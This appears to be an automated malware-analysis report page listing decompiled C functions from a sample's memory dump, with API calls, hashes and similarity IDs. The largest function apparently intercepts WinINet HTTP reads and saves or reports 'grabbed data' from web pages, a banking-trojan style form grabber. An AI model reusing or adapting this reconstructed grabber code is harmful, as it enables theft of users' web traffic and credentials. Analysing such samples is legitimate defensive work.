    • Instruction ID: 9cff67a7de51c08ebb4d54696f35b71653abbf044425d0da1cacd91edba2ed74
    • Opcode Fuzzy Hash: b2196cc7b70a747e3e9d0d8dbe1991aa683add7a991206fe8cd9dad19a738dd0
    • Instruction Fuzzy Hash: 6C01D475504298BEDB115FA4CC85AEF7F6CDF16348B05807AEA42A2240D57D4D1583A9
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040DD3C, Relevance: 3.0, APIs: 2, Instructions: 8fileCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040DD3C(WCHAR* _a4) {
				signed int _t6;

				SetFileAttributesW(_a4, 0x20); // executed
				_t6 = DeleteFileW(_a4); // executed
				return _t6 & 0xffffff00 | _t6 != 0x00000000;
			}




    0x0040dd42
    0x0040dd4c
    0x0040dd57

    APIs
    • SetFileAttributesW.KERNELBASE(?,00000020,0040FBDD,?,?,?,00000000), ref: 0040DD42
    • DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 0040DD4C
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$AttributesDelete
    • String ID:
    • API String ID: 2910425767-0
    • Opcode ID: 18ad8fa84f13e70ee676bcf07f0193b867c792d33b0cb2a9c81311357d682747
    • Instruction ID: dbe5fead099cb67c7076b3957739c9df6c4ef7b2d947c40954e13fccb5770d29
    • Opcode Fuzzy Hash: 18ad8fa84f13e70ee676bcf07f0193b867c792d33b0cb2a9c81311357d682747
    • Instruction Fuzzy Hash: 6AC04831204201ABD6411B20DE4AB4EBEAABF94B41F04C438B245C40B0EBB189B0AB49
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040966F, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
    Download Yara Rule
    APIs
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,00405A11,?,?), ref: 00409690
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FolderPathSpecial
    • String ID:
    • API String ID: 994120019-0
    • Opcode ID: cc939c4c6eb5290adce94b212c3e0db36053c86202c439b57d3366095abac454
    • Instruction ID: 4c9e5333b0bb21662b4f4683e8a935341a57244265424c402ab03a78b2fd3571
    • Opcode Fuzzy Hash: cc939c4c6eb5290adce94b212c3e0db36053c86202c439b57d3366095abac454
    • Instruction Fuzzy Hash: EAD012B1A245105FFB0C4724DD7BBB53354DF14761F05431CB617CE5E0E6D528509728
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040CF2D, Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040CF2D(void* __eax) {
				void* _t3;

				_t3 = RtlAllocateHeap( *0x413e5c, 8, __eax + 4); // executed
				return _t3;
			}




    0x0040cf39
    0x0040cf3f

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,0040952C), ref: 0040CF39
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: ca0a7180ccbd02f4f20ed126b8f74e8178922a9c2c9e918b62b614b20be52596
    • Instruction ID: bc4d240c11f007c77c41f88aa4c5b0e29e98c7b78a6deee8ec7153b24fd60b01
    • Opcode Fuzzy Hash: ca0a7180ccbd02f4f20ed126b8f74e8178922a9c2c9e918b62b614b20be52596
    • Instruction Fuzzy Hash: 9CB00175580700AAFE515B10FE1ABA53B69E750B1BF14C171B542E42B0CAA1A9249B18
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    Function 0040B44D, Relevance: 44.4, APIs: 23, Strings: 2, Instructions: 601networkmemorywindowCOMMON
    Download Yara Rule
    C-Code - Quality: 88%
    			E0040B44D(void _a4) {
				void _v1116;
				char _v1132;
				char _v1156;
				short _v1160;
				char _v1408;
				char _v1424;
				int _v1448;
				char* _v1452;
				struct _SYSTEMTIME _v1468;
				char* _v1476;
				long _v1484;
				long _v1488;
				char _v1496;
				int _v1520;
				signed char* _v1548;
				int _v1552;
				long _v1556;
				long _v1564;
				intOrPtr _v1568;
				signed int _v1572;
				struct _GOPHER_FIND_DATAA _v1576;
				signed short _v1578;
				signed short* _v1580;
				signed short _v1582;
				long _v1584;
				char _v1588;
				struct _GOPHER_FIND_DATAA _v1592;
				char _v1593;
				intOrPtr _v1600;
				intOrPtr _v1612;
				intOrPtr _v1616;
				intOrPtr _v1624;
				char _v1633;
				void* __edi;
				void* __esi;
				void* _t254;
				void _t270;
				struct _GOPHER_FIND_DATAA _t271;
				void _t274;
				signed int _t281;
				char _t285;
				signed short* _t291;
				struct _GOPHER_FIND_DATAA _t292;
				struct _GOPHER_FIND_DATAA _t295;
				struct _GOPHER_FIND_DATAA _t298;
				int _t305;
				struct _GOPHER_FIND_DATAA _t307;
				void* _t315;
				signed int _t320;
				intOrPtr _t322;
				signed int _t324;
				void* _t328;
				signed short _t352;
				struct _GOPHER_FIND_DATAA _t375;
				signed short _t376;
				void* _t379;
				struct _GOPHER_FIND_DATAA _t389;
				struct _GOPHER_FIND_DATAA _t390;
				struct _GOPHER_FIND_DATAA _t393;
				long _t397;
				intOrPtr* _t398;
				int _t400;
				long _t405;
				long _t409;
				signed char* _t413;
				char* _t414;
				struct _GOPHER_FIND_DATAA _t415;
				struct _GOPHER_FIND_DATAA _t418;
				void* _t425;
				struct _GOPHER_FIND_DATAA _t426;
				struct _GOPHER_FIND_DATAA _t431;
				struct _GOPHER_FIND_DATAA _t438;
				char _t462;
				void _t463;
				short _t465;
				void _t474;
				struct _GOPHER_FIND_DATAA _t478;
				void* _t480;
				struct _GOPHER_FIND_DATAA _t489;
				signed short* _t493;
				struct _GOPHER_FIND_DATAA _t494;
				struct _GOPHER_FIND_DATAA _t496;
				struct _GOPHER_FIND_DATAA _t497;
				struct _GOPHER_FIND_DATAA _t498;
				signed int _t499;
				void* _t501;

				_t501 = (_t499 & 0xfffffff8) - 0x5e4;
				_t254 =  *_a4;
				_v1488 = 1;
				_t409 = 4;
				if(_t254 == 0 || _t254 == 0xffffffff) {
					 *(_a4 + 0x40) = RtlAllocateHeap( *0x413e5c, 8, 0x1004);
					if( *(_a4 + 0x40) != 0) {
						 *(_a4 + 0x34) = CreateEventW(0, 1, 0, 0);
						_v1484 = _t409;
						InternetQueryOptionA( *(_a4 + 8), 0x2d, _a4 + 0x3c,  &_v1484);
						 *((intOrPtr*)(_a4 + 0x38)) = InternetSetStatusCallback( *(_a4 + 8), E0040B429);
						InternetSetOptionA( *(_a4 + 8), 0x2d,  &_a4, _t409);
						goto L5;
					}
					goto L3;
				} else {
					L5:
					_t462 = 0x28;
					E0040CFFE( &_v1484,  &_v1484, 0, _t462);
					_v1496 = _t462;
					_v1476 =  *(_a4 + 0x40);
					while(1) {
						L6:
						_t270 = _a4;
						_v1468.wHour.hwnd = 0x1000;
						_t271 =  *0x412a44( *((intOrPtr*)(_t270 + 8)),  &_v1484, 8, _t270);
						__eflags = _t271;
						if(_t271 != 0) {
							break;
						}
						_t397 = GetLastError();
						_v1520 = _t397;
						__eflags = _t397 - 0x3e5;
						if(_t397 != 0x3e5) {
							L18:
							_v1552 = 0;
							L19:
							InternetSetOptionA( *(_a4 + 8), 0x2d, _a4 + 0x3c, _t409);
							_t274 = _a4;
							__eflags =  *(_t274 + 0x38) - 0xffffffff;
							if( *(_t274 + 0x38) != 0xffffffff) {
								_t425 =  *(_t274 + 0x38);
							} else {
								_t425 = 0;
							}
							InternetSetStatusCallback( *(_t274 + 8), _t425);
							CloseHandle( *(_a4 + 0x34));
							__eflags = _v1576;
							if(_v1576 == 0) {
								L88:
								_t463 = _a4;
								goto L89;
							} else {
								_t463 = _a4;
								_v1593 = 0;
								_v1568 = 0;
								__eflags =  *(_t463 + 0x2c);
								if( *(_t463 + 0x2c) <= 0) {
									L89:
									E0040CF40( *(_t463 + 0x40));
									 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
									 *0x412dd4(0x412e1c);
									_t474 = _a4;
									_t281 = E0040A783( *((intOrPtr*)(_t474 + 8)));
									__eflags = _t281 - 0xffffffff;
									if(_t281 != 0xffffffff) {
										__eflags = _t474 + 4;
										E0040CF7C(_t281 * 0x30 +  *0x412e10, _t474 + 4, 0x30);
									}
									 *0x412dd8(0x412e1c);
									_t283 = _a4;
									_t426 =  *_a4;
									__eflags = _t426;
									if(_t426 > 0) {
										__eflags = _t426 - 0xffffffff;
										if(_t426 != 0xffffffff) {
											_v1568 = _v1552;
											_v1572 = _v1584;
											E0040AFDF( *((intOrPtr*)(_t283 + 8)),  *((intOrPtr*)(_t283 + 0x3c)), 0x64,  &_v1572, 8);
											_t283 = _a4;
										}
									}
									E0040CF40(_t283);
									_t285 = _v1588;
									L95:
									return _t285;
								} else {
									_v1552 = 0;
									do {
										_t413 =  *((intOrPtr*)(_t463 + 0x28)) + _v1552;
										_t431 = _t413[0x14];
										_v1548 = _t413;
										__eflags = _t431;
										if(_t431 == 0) {
											L29:
											_t291 = _t413[4];
											_t433 = _t291 + _t413[8];
											_v1572 = 0;
											_v1584 = 0;
											_v1564 = _t433;
											__eflags = _t291 - _t433;
											if(_t291 >= _t433) {
												L62:
												__eflags =  *_t413 & 0x00000001;
												if(( *_t413 & 0x00000001) != 0) {
													_t478 = _v1572;
													__eflags = _t478;
													if(_t478 != 0) {
														_v1556 = 0xfff;
														_t324 = InternetQueryOptionA( *(_t463 + 8), 0x22,  *(_t463 + 0x40),  &_v1556);
														__eflags = _t324;
														if(_t324 == 0) {
															_t174 =  &_v1572;
															 *_t174 = _v1572 & _t324;
															__eflags =  *_t174;
															 *( *(_a4 + 0x40)) = 0;
														}
														 *((char*)(_v1600 + _t478)) = 0;
														__eflags =  *_t413 & 0x00000002;
														if(( *_t413 & 0x00000002) == 0) {
															_t328 = E0040D379(_v1572,  *(_a4 + 0x40));
															_push(_t478);
															E00410EC7(_t433, _t463, __eflags, 0xc9, _t328, 0, L"Grabbed data from: %S\n\n%S",  *(_a4 + 0x40));
															_t501 = _t501 + 0x18;
															E0040CF40(_t328);
														} else {
															_t465 = 0x3c;
															E0040CFFE( &(_v1468.wSecond),  &(_v1468.wSecond), 0, _t465);
															_v1452 =  &_v1408;
															_v1468.wYear = _t465;
															_v1448 = 0x103;
															InternetCrackUrlA( *(_a4 + 0x40), _v1584, 0,  &_v1468);
															GetSystemTime( &_v1584);
															wnsprintfW( &_v1160, 0x103, L"grab_%S_%02u_%02u_%02u.bin",  &_v1424, (_v1584 & 0x0000ffff) - 0x7d0, _v1582 & 0x0000ffff, _v1578 & 0x0000ffff);
															_t501 = _t501 + 0x1c;
															E00410DB9(_t433, _t465, 3, 0,  &_v1156, _t478, _v1624);
														}
														E0040CF40(_t478);
														_t463 = _a4;
													}
												}
												_t292 = _t413[0xc];
												__eflags = _t292;
												if(_t292 != 0) {
													__eflags =  *_t292;
													if( *_t292 != 0) {
														E0040CF40( *0x412e14);
														_t320 = E0040D0D5(E0040CF40( *0x412e18) | 0xffffffff, _t413[0xc]);
														 *0x412e14 = _t320;
														__eflags = _t320 | 0xffffffff;
														_t322 = E0040D0D5(_t320 | 0xffffffff, _t413[0x10]);
														_t463 = _a4;
														 *0x412e18 = _t322;
													}
												}
												__eflags =  *_t413 & 0x00000008;
												if(( *_t413 & 0x00000008) != 0) {
													_t415 = _t413[0x10];
													__eflags = _t415;
													if(_t415 != 0) {
														E0040DE73( &_v1484, _t415, E0040D3C6(_t415));
														GetSystemTime( &_v1468);
														_push( &_v1468);
														_push( &_v1496);
														_push(0);
														_t315 = 0x10;
														E004079B5(_t315, __eflags);
														_t463 = _a4;
													}
												}
												goto L76;
											} else {
												goto L30;
											}
											while(1) {
												L30:
												_t493 = _t291 + ( *_t291 & 0x0000ffff);
												_t433 = _t493 + ( *_t493 & 0x0000ffff);
												_v1580 = _t433;
												__eflags = _t493 - _t433;
												if(_t493 >= _t433) {
													goto L62;
												}
												_t433 = _v1564;
												__eflags = _v1580 - _t433;
												if(_v1580 >= _t433) {
													goto L62;
												}
												_t438 = _t433 | 0xffffffff;
												_v1588 = 0;
												_v1592 = _t438;
												__eflags = _t291[2];
												if(_t291[2] == 0) {
													L35:
													__eflags = _t493[2];
													if(_t493[2] == 0) {
														L38:
														_t352 = _v1580[2] & 0x0000ffff;
														__eflags = _t352;
														if(_t352 == 0) {
															_t480 = 0;
															__eflags = 0;
														} else {
															_t480 = ( *_v1580 & 0x0000ffff) - (_t352 & 0x0000ffff);
														}
														__eflags = _t493[2];
														if(_t493[2] == 0) {
															_t438 = 0;
															__eflags = 0;
															_v1592 = 0;
														}
														__eflags =  *_t413 & 0x00000001;
														if(( *_t413 & 0x00000001) == 0) {
															_t418 =  *((intOrPtr*)(_t463 + 0x20)) - _t438 + _t480;
															__eflags = _t418;
															if(_t418 == 0) {
																L57:
																_t413 = _v1548;
																goto L58;
															}
															_t494 = E0040CF2D(_t418);
															__eflags = _t494;
															if(_t494 == 0) {
																_t413 = _v1548;
																goto L53;
															}
															E0040CF7C(_t494,  *(_a4 + 0x1c), _v1588);
															E0040CF7C(_v1600 + _t494, ( *(_v1592 + 4) & 0x0000ffff) + _v1592, _t480);
															__eflags = _t494 + _t480 + _v1612;
															E0040CF7C(_t494 + _t480 + _v1612,  *(_a4 + 0x1c) + _v1616 + _v1612,  *(_a4 + 0x20) - _v1616 - _v1612);
															E0040CF40( *(_a4 + 0x1c));
															 *(_a4 + 0x1c) = _t494;
															 *(_a4 + 0x20) = _t418;
															_t463 = _a4;
															_v1633 = 1;
															goto L57;
														} else {
															__eflags = _t438;
															if(_t438 == 0) {
																_t438 =  *((intOrPtr*)(_t463 + 0x20)) - _v1588;
																__eflags = _t438;
																_v1592 = _t438;
															}
															_t433 = _v1584;
															_t375 = E0040CED8(_t480 + _t438 + _v1584 + 4,  &_v1572);
															__eflags = _t375;
															if(_t375 == 0) {
																_t463 = _a4;
															} else {
																_t444 = _v1580;
																_t376 = _v1580[2] & 0x0000ffff;
																_t496 = _v1584;
																__eflags = _t376;
																if(_t376 > 0) {
																	E0040CF7C(_v1572 + _t496, (_t376 & 0x0000ffff) + _t444, _t480);
																	_t496 = _t496 + _t480;
																	__eflags = _t496;
																}
																_t379 = E0040CF7C(_v1572 + _t496,  *(_a4 + 0x1c) + _v1588, _v1592);
																__eflags =  *_t413 & 0x00000004;
																if(( *_t413 & 0x00000004) == 0) {
																	_t497 = _t496 + E00404C56(_t379, _v1592);
																	__eflags = _t497;
																} else {
																	_t497 = _t496 + _v1592;
																}
																 *((char*)(_t497 + _v1572)) = 0xa;
																_t498 = _t497 + 1;
																__eflags = _t498;
																_v1584 = _t498;
																L53:
																_t463 = _a4;
																L58:
																_t433 = _v1580;
																_t291 = _v1580 + ( *_v1580 & 0x0000ffff);
																__eflags = _t291 - _v1564;
																if(_t291 < _v1564) {
																	continue;
																}
															}
															goto L62;
														}
													}
													_t389 = E00408C0D(_t493 + (_t493[2] & 0x0000ffff), ( *_t493 & 0x0000ffff) - (_t493[2] & 0x0000ffff),  *((intOrPtr*)(_t463 + 0x1c)) + _v1588,  *((intOrPtr*)(_t463 + 0x20)) - _v1588, 0,  &_v1592, 0xb);
													__eflags = _t389;
													if(_t389 == 0) {
														goto L53;
													} else {
														_t463 = _a4;
														_t438 = _v1592;
														goto L38;
													}
												}
												_t390 = E00408C0D(_t291 + (_t291[2] & 0x0000ffff), ( *_t291 & 0x0000ffff) - (_t291[2] & 0x0000ffff),  *((intOrPtr*)(_t463 + 0x1c)),  *((intOrPtr*)(_t463 + 0x20)),  &_v1588, 0, 0xb);
												__eflags = _t390;
												if(_t390 == 0) {
													goto L53;
												} else {
													_t463 = _a4;
													_t438 = _v1592;
													goto L35;
												}
											}
											goto L62;
										}
										__eflags =  *_t431 - 0x2a;
										if( *_t431 != 0x2a) {
											L28:
											_t295 = E00408C0D(_t431, E0040D3C6(_t431),  *((intOrPtr*)(_t463 + 0x1c)),  *((intOrPtr*)(_t463 + 0x20)), 0, 0, 8);
											_t463 = _a4;
											__eflags = _t295;
											if(_t295 == 0) {
												goto L76;
											}
											goto L29;
										}
										__eflags =  *((char*)(_t431 + 1));
										if( *((char*)(_t431 + 1)) == 0) {
											goto L29;
										}
										goto L28;
										L76:
										_v1568 = _v1568 + 1;
										_v1552 = _v1552 + 0x18;
										__eflags = _v1568 -  *(_t463 + 0x2c);
									} while (_v1568 <  *(_t463 + 0x2c));
									__eflags = _v1593;
									if(_v1593 == 0) {
										goto L89;
									}
									_v1564 = 0x400;
									_t298 = InternetQueryOptionA( *(_t463 + 8), 0x22,  &_v1116,  &_v1564);
									__eflags = _t298;
									if(_t298 != 0) {
										_t299 = _v1580;
										__eflags = _v1580 - 8;
										if(_v1580 > 8) {
											_t414 = E0040D379(_t299,  &_v1132);
											__eflags = _t414;
											if(_t414 != 0) {
												_v1584 = 0x1000;
												_t489 = E0040CF2D(0x1000);
												__eflags = _t489;
												if(_t489 != 0) {
													 *_t489 = 0x50;
													_t305 = GetUrlCacheEntryInfoW(_t414, _t489,  &_v1584);
													__eflags = _t305;
													if(_t305 != 0) {
														_t307 =  *(_t489 + 8);
														__eflags = _t307;
														if(_t307 != 0) {
															__eflags =  *_t307;
															if( *_t307 != 0) {
																E0040DB9E( *(_a4 + 0x20), _t307,  *(_a4 + 0x1c));
															}
														}
													}
													E0040CF40(_t489);
												}
												E0040CF40(_t414);
											}
										}
									}
									goto L88;
								}
							}
						}
						_t398 = _a4;
						__eflags =  *_t398 - 0xffffffff;
						if( *_t398 == 0xffffffff) {
							L11:
							_t400 = PeekMessageW( &(_v1468.wHour), 0, 0, 0, 1);
							__eflags = _t400;
							if(_t400 != 0) {
								DispatchMessageW( &(_v1468.wHour));
								goto L11;
							}
							_t405 = MsgWaitForMultipleObjects(1, _a4 + 0x34, 0, 0xffffffff, 0x4bf);
							__eflags = _t405;
							if(_t405 != 0) {
								goto L11;
							} else {
								ResetEvent( *(_a4 + 0x34));
								continue;
							}
						} else {
							 *_t398 =  *_t398 + 1;
							L3:
							_t285 = 0;
							goto L95;
						}
					}
					_v1520 = 0;
					__eflags = _v1476;
					if(_v1476 == 0) {
						goto L19;
					}
					_t393 = E0040CEF9( &(_v1476[ *(_a4 + 0x20)]),  *(_a4 + 0x1c));
					__eflags = _t393;
					if(_t393 == 0) {
						_v1520 = 8;
						goto L18;
					} else {
						 *(_a4 + 0x1c) = _t393;
						E0040CF7C( *(_a4 + 0x20) +  *(_a4 + 0x1c),  *(_a4 + 0x40), _v1476);
						 *(_a4 + 0x20) =  *(_a4 + 0x20) + _v1488;
						goto L6;
					}
				}
			}

























































































    0x0040b453
    0x0040b45c
    0x0040b468
    0x0040b46c
    0x0040b46f
    0x0040b48c
    0x0040b495
    0x0040b4ab
    0x0040b4bc
    0x0040b4c3
    0x0040b4dd
    0x0040b4ed
    0x00000000
    0x0040b4ed
    0x00000000
    0x0040b4f3
    0x0040b4f3
    0x0040b4f5
    0x0040b4fd
    0x0040b505
    0x0040b50c
    0x0040b510
    0x0040b510
    0x0040b510
    0x0040b51b
    0x0040b526
    0x0040b52c
    0x0040b52e
    0x00000000
    0x00000000
    0x0040b530
    0x0040b536
    0x0040b53a
    0x0040b53f
    0x0040b5f6
    0x0040b5f6
    0x0040b5fa
    0x0040b607
    0x0040b60d
    0x0040b610
    0x0040b614
    0x0040b61a
    0x0040b616
    0x0040b616
    0x0040b616
    0x0040b621
    0x0040b62d
    0x0040b633
    0x0040b637
    0x0040bb50
    0x0040bb50
    0x00000000
    0x0040b63d
    0x0040b63d
    0x0040b642
    0x0040b647
    0x0040b64b
    0x0040b64e
    0x0040bb53
    0x0040bb56
    0x0040bb5e
    0x0040bb68
    0x0040bb6e
    0x0040bb74
    0x0040bb79
    0x0040bb7c
    0x0040bb89
    0x0040bb8e
    0x0040bb8e
    0x0040bb94
    0x0040bb9a
    0x0040bb9d
    0x0040bb9f
    0x0040bba1
    0x0040bba3
    0x0040bba6
    0x0040bbac
    0x0040bbb4
    0x0040bbc7
    0x0040bbcc
    0x0040bbcc
    0x0040bba6
    0x0040bbd0
    0x0040bbd5
    0x0040bbd9
    0x0040bbdf
    0x0040b654
    0x0040b654
    0x0040b658
    0x0040b65b
    0x0040b661
    0x0040b664
    0x0040b668
    0x0040b66a
    0x0040b698
    0x0040b698
    0x0040b69e
    0x0040b6a0
    0x0040b6a4
    0x0040b6a8
    0x0040b6ac
    0x0040b6ae
    0x0040b8d5
    0x0040b8d5
    0x0040b8d8
    0x0040b8de
    0x0040b8e2
    0x0040b8e4
    0x0040b8ef
    0x0040b8ff
    0x0040b905
    0x0040b907
    0x0040b909
    0x0040b909
    0x0040b909
    0x0040b913
    0x0040b913
    0x0040b91a
    0x0040b91e
    0x0040b921
    0x0040b9d8
    0x0040b9dd
    0x0040b9f3
    0x0040b9f8
    0x0040b9fc
    0x0040b927
    0x0040b929
    0x0040b935
    0x0040b941
    0x0040b95e
    0x0040b965
    0x0040b96f
    0x0040b97a
    0x0040b9ad
    0x0040b9b3
    0x0040b9c7
    0x0040b9c7
    0x0040ba02
    0x0040ba07
    0x0040ba07
    0x0040b8e4
    0x0040ba0a
    0x0040ba0d
    0x0040ba0f
    0x0040ba11
    0x0040ba14
    0x0040ba1c
    0x0040ba32
    0x0040ba3a
    0x0040ba3f
    0x0040ba42
    0x0040ba47
    0x0040ba4a
    0x0040ba4a
    0x0040ba14
    0x0040ba4f
    0x0040ba52
    0x0040ba54
    0x0040ba57
    0x0040ba59
    0x0040ba6c
    0x0040ba79
    0x0040ba86
    0x0040ba8e
    0x0040ba8f
    0x0040ba93
    0x0040ba94
    0x0040ba99
    0x0040ba99
    0x0040ba59
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040b6b4
    0x0040b6b4
    0x0040b6b7
    0x0040b6bc
    0x0040b6be
    0x0040b6c2
    0x0040b6c4
    0x00000000
    0x00000000
    0x0040b6ca
    0x0040b6ce
    0x0040b6d2
    0x00000000
    0x00000000
    0x0040b6da
    0x0040b6dd
    0x0040b6e1
    0x0040b6e5
    0x0040b6e9
    0x0040b718
    0x0040b718
    0x0040b71d
    0x0040b758
    0x0040b75c
    0x0040b760
    0x0040b763
    0x0040b773
    0x0040b773
    0x0040b765
    0x0040b76f
    0x0040b76f
    0x0040b775
    0x0040b77a
    0x0040b77c
    0x0040b77c
    0x0040b77e
    0x0040b77e
    0x0040b782
    0x0040b785
    0x0040b828
    0x0040b828
    0x0040b82a
    0x0040b8b0
    0x0040b8b0
    0x00000000
    0x0040b8b0
    0x0040b837
    0x0040b839
    0x0040b83b
    0x0040b8c9
    0x00000000
    0x0040b8c9
    0x0040b84c
    0x0040b864
    0x0040b887
    0x0040b88c
    0x0040b897
    0x0040b89f
    0x0040b8a5
    0x0040b8a8
    0x0040b8ab
    0x00000000
    0x0040b78b
    0x0040b78b
    0x0040b78d
    0x0040b792
    0x0040b792
    0x0040b796
    0x0040b796
    0x0040b79d
    0x0040b7a9
    0x0040b7ae
    0x0040b7b0
    0x0040b8d2
    0x0040b7b6
    0x0040b7b6
    0x0040b7ba
    0x0040b7be
    0x0040b7c2
    0x0040b7c5
    0x0040b7d5
    0x0040b7da
    0x0040b7da
    0x0040b7da
    0x0040b7f2
    0x0040b7f7
    0x0040b7fa
    0x0040b80c
    0x0040b80c
    0x0040b7fc
    0x0040b7fc
    0x0040b7fc
    0x0040b812
    0x0040b816
    0x0040b816
    0x0040b817
    0x0040b81b
    0x0040b81b
    0x0040b8b4
    0x0040b8b4
    0x0040b8bb
    0x0040b8bd
    0x0040b8c1
    0x00000000
    0x00000000
    0x0040b8c7
    0x00000000
    0x0040b7b0
    0x0040b785
    0x0040b744
    0x0040b749
    0x0040b74b
    0x00000000
    0x0040b751
    0x0040b751
    0x0040b754
    0x00000000
    0x0040b754
    0x0040b74b
    0x0040b704
    0x0040b709
    0x0040b70b
    0x00000000
    0x0040b711
    0x0040b711
    0x0040b714
    0x00000000
    0x0040b714
    0x0040b70b
    0x00000000
    0x0040b6b4
    0x0040b66c
    0x0040b66f
    0x0040b677
    0x0040b688
    0x0040b68d
    0x0040b690
    0x0040b692
    0x00000000
    0x00000000
    0x00000000
    0x0040b692
    0x0040b671
    0x0040b675
    0x00000000
    0x00000000
    0x00000000
    0x0040ba9c
    0x0040ba9c
    0x0040baa4
    0x0040baa9
    0x0040baa9
    0x0040bab2
    0x0040bab7
    0x00000000
    0x00000000
    0x0040bacc
    0x0040bad7
    0x0040badd
    0x0040badf
    0x0040bae1
    0x0040bae5
    0x0040bae8
    0x0040baf7
    0x0040baf9
    0x0040bafb
    0x0040bb02
    0x0040bb0b
    0x0040bb0d
    0x0040bb0f
    0x0040bb18
    0x0040bb1e
    0x0040bb24
    0x0040bb26
    0x0040bb28
    0x0040bb2b
    0x0040bb2d
    0x0040bb2f
    0x0040bb33
    0x0040bb3f
    0x0040bb3f
    0x0040bb33
    0x0040bb2d
    0x0040bb45
    0x0040bb45
    0x0040bb4b
    0x0040bb4b
    0x0040bafb
    0x0040bae8
    0x00000000
    0x0040badf
    0x0040b64e
    0x0040b637
    0x0040b545
    0x0040b548
    0x0040b54b
    0x0040b562
    0x0040b56e
    0x0040b574
    0x0040b576
    0x0040b55c
    0x00000000
    0x0040b55c
    0x0040b588
    0x0040b58e
    0x0040b590
    0x00000000
    0x0040b592
    0x0040b598
    0x00000000
    0x0040b598
    0x0040b54d
    0x0040b54d
    0x0040b497
    0x0040b497
    0x00000000
    0x0040b497
    0x0040b54b
    0x0040b5a3
    0x0040b5a7
    0x0040b5ab
    0x00000000
    0x00000000
    0x0040b5ba
    0x0040b5bf
    0x0040b5c1
    0x0040b5ee
    0x00000000
    0x0040b5c3
    0x0040b5c6
    0x0040b5da
    0x0040b5e6
    0x00000000
    0x0040b5e6
    0x0040b5c1

    APIs
    • RtlAllocateHeap.NTDLL(00000008,00001004), ref: 0040B483
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040B4A2
    • InternetQueryOptionA.WININET(?,0000002D,?,?), ref: 0040B4C3
    • InternetSetStatusCallback.WININET(?,0040B429), ref: 0040B4D4
    • InternetSetOptionA.WININET(?,0000002D,?,00000004), ref: 0040B4ED
    • InternetReadFileExA.WININET(?), ref: 0040B526
    • GetLastError.KERNEL32 ref: 0040B530
    • DispatchMessageW.USER32(?), ref: 0040B55C
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040B56E
    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004BF), ref: 0040B588
    • ResetEvent.KERNEL32(?), ref: 0040B598
    • InternetSetOptionA.WININET(?,0000002D,?,00000004), ref: 0040B607
    • InternetSetStatusCallback.WININET(?,000000FF), ref: 0040B621
    • CloseHandle.KERNEL32(?), ref: 0040B62D
    • InternetQueryOptionA.WININET(?,00000022,?,?), ref: 0040B8FF
    • InternetCrackUrlA.WININET(?,?,00000000,?), ref: 0040B96F
    • GetSystemTime.KERNEL32(?), ref: 0040B97A
    • GetSystemTime.KERNEL32(?,?,?,00000000), ref: 0040BA79
    • InternetQueryOptionA.WININET(?,00000022,?,?), ref: 0040BAD7
    • GetUrlCacheEntryInfoW.WININET(00000000,00000000,00000000), ref: 0040BB1E
    • wnsprintfW.SHLWAPI ref: 0040B9AD
      • Part of subcall function 0040CF40: HeapFree.KERNEL32(00000000,00000000,0040958E,00000000,00000001), ref: 0040CF53
      • Part of subcall function 0040DE73: CryptAcquireContextW.ADVAPI32(0040FCF8,00000000,00000000,00000001,F0000040,?,0040FCF8,00000000,?,-0000001C,00000000,?,?,?), ref: 0040DE8C
      • Part of subcall function 0040DE73: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 0040DEA4
      • Part of subcall function 0040DE73: CryptHashData.ADVAPI32(?,00000010), ref: 0040DEBF
      • Part of subcall function 0040DE73: CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 0040DED6
      • Part of subcall function 0040DE73: CryptDestroyHash.ADVAPI32(?), ref: 0040DEED
      • Part of subcall function 0040DE73: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040DEF7
    • RtlEnterCriticalSection.NTDLL(00412E1C), ref: 0040BB68
    • RtlLeaveCriticalSection.NTDLL(00412E1C), ref: 0040BB94
    Strings
    • grab_%S_%02u_%02u_%02u.bin, xrefs: 0040B99F
    • Grabbed data from: %S%S, xrefs: 0040B9E6
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Internet$Crypt$Option$Hash$Query$CallbackContextCreateCriticalEventHeapMessageSectionStatusSystemTime$AcquireAllocateCacheCloseCrackDataDestroyDispatchEnterEntryErrorFileFreeHandleInfoLastLeaveMultipleObjectsParamPeekReadReleaseResetWaitwnsprintf
    • String ID: Grabbed data from: %S%S$grab_%S_%02u_%02u_%02u.bin
    • API String ID: 229834109-2564430838
    • Opcode ID: 38d126545ea893dc68775dbb5c2f977284525d8fb094606420f00977bbc5ff8a
    • Instruction ID: 28d41342af25e4f4df2e4e36875addbdafe44f0483dbb9bf93b1f01ef23687ff
    • Opcode Fuzzy Hash: 38d126545ea893dc68775dbb5c2f977284525d8fb094606420f00977bbc5ff8a
    • Instruction Fuzzy Hash: DE32AE71604301AFC714DF24C884EAB7BE9FF88354F04856EF989AB2A1D774D941CB9A
    Uniqueness

    Uniqueness Score: -1.00%

